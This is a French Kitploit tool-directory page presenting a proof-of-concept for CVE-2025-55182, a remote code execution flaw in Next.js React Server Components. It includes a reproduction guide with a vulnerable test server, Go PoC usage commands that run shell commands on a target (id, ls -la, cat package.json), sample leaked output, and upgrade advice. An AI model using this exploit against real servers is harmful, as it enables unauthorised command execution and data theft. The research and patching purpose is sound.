Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2025-55182 — Preuve de concept pour CVE-2025-55182, une vulnérabilité RCE dans Next.js via une désérialisation non sécurisée dans les requêtes RSC. Inclut un script POC en Go et un serveur de test vulnérable pour la recherche et l'éducation en sécurité. | Kitploit
Outils/GitHubGitHub/hoosin/cve-2025-55182
Génération de PayloadsAnalyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionApprentissage et Éducation
GitHubhoosin/cve-2025-55182

CVE-2025-55182

Preuve de concept pour CVE-2025-55182, une vulnérabilité RCE dans Next.js via une désérialisation non sécurisée dans les requêtes RSC. Inclut un script POC en Go et un serveur de test vulnérable pour la recherche et l'éducation en sécurité.

Voir le dépôt
3il y a 8 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Guide de reproduction du RCE CVE-2025-55182 Next.js

Avertissement

⚠️ Cet outil est destiné uniquement à la recherche en sécurité et à l'enseignement. Ne l'utilisez pas à des fins illégales. ⚠️

Introduction à la vulnérabilité

CVE-2025-55182 est une vulnérabilité grave d'exécution de code à distance (RCE) dans le framework Next.js. Cette vulnérabilité provient d'un problème de désérialisation non sécurisée lors du traitement des requêtes React Server Components (RSC) par Next.js. Un attaquant peut exécuter du code arbitraire sur le serveur sans autorisation en construisant des requêtes HTTP malveillantes.

Versions affectées :

  • Next.js 15.x < 15.0.5
  • Next.js 16.x < 16.0.7
  • ainsi que certaines versions Canary

Configuration de l'environnement

Ce projet fournit un serveur de test Next.js vulnérable test-server.

1. Démarrer le serveur de test

Assurez-vous d'avoir installé Node.js et npm.

root@kitploit:~
cd test-server
npm install
npm run dev

Le serveur fonctionne par défaut sur http://localhost:3000.

Remarque : Si vous rencontrez une erreur de fichier lock, essayez d'exécuter :

root@kitploit:~
rm -f .next/dev/lock && npm run dev

Reproduction de la vulnérabilité (POC)

Ce projet fournit un script POC en Go poc.go.

Utilisation du script Go

Utilisation :

root@kitploit:~
go run poc.go [URL cible] [commande à exécuter]

Exemples :

  1. Exécuter la commande id (par défaut)

    root@kitploit:~
    go run poc.go
    

    ou

    root@kitploit:~
    go run poc.go http://localhost:3000 id
    
  2. Lister les fichiers du répertoire courant

    root@kitploit:~
    go run poc.go http://localhost:3000 "ls -la"
    
  3. Afficher le contenu d'un fichier

    root@kitploit:~
    go run poc.go http://localhost:3000 "cat package.json"
    

Sortie attendue : Bien que le code d'état HTTP renvoie 500, le résultat de l'exécution de la commande est inclus dans le champ digest de la réponse.

root@kitploit:~
1:E{"digest":"uid=502(hoosin) gid=20(staff) ...","name":"Error","message":"NEXT_REDIRECT",...}

Recommandations de correction

Mettez à jour Next.js vers une version sécurisée :

  • Next.js 15.x -> 15.0.5+
  • Next.js 16.x -> 16.0.7+
root@kitploit:~
npm install next@latest react@latest react-dom@latest
Télécharger l’outil